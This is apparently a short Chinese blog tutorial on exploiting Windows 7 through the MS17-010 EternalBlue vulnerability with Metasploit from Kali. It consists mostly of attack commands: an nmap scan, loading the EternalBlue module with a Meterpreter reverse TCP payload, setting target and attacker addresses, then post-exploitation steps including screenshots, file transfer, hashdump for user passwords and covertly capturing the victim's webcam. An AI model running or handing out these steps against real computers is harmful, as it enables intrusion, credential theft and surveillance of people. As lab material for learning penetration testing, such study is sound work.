MetaSploit

泽谦
18 阅读1分钟

MetaSploit

  • 如何使用:MetaSploit进行渗透测试:
  • Win 7 MS17-010 永恒之蓝
  • Kali
  • Nmap 网络扫描工具

MetaSploit 的渗透全过程支持

  1. 情报搜集 使用nmap 进行扫描探测 nmap -T4 -A -v -Pn ip 然后找到445TCP端口 是否开启

image.png 2. 启动MetaSploit 启动命令是msfconsole

image.png 3. 搜索漏洞名称: search ms17-010

image.png 4. 使用序号为1 的攻击模块就是 use exploit/windows/smb/ms17_010_eternalblue

  1. 设置攻击负载 set payload windows/x64/meterpreter/reverse_tcp
  2. 设置受害IP: set rhost IP
  3. 设置攻击IP: set lhost IP (kail)

image.png 8. 查看设置的命令 show options

image.png 9. 开始攻击: run 或者 exploit 当出现WIN,代表你已经可以控制对方的电脑了,可以使用win命令控制受害者的电脑

image.png

  1. 开始操作攻击者电脑,上传图片到C盘,从受害者电脑截图会保存在攻击者电脑上然后上传到受害者电脑上,同样下载也是如此

image.png 11. 获取用户权限

image.png

win相关指令的代码:

  • screenshot 获取屏幕快照
  • 上传文件: upload + 路径
  • 下载文件: download 受害者的路径 本地路径
  • 查看权限:getuid 在使用 shell进入win7系统, hashdump可以获取用户的名称和密码
  • wbcam_list 查看摄像头
  • wbcam_snap 摄像头拍照
  • wbcam_stream 摄像头开启视频
avatar
文章
阅读
粉丝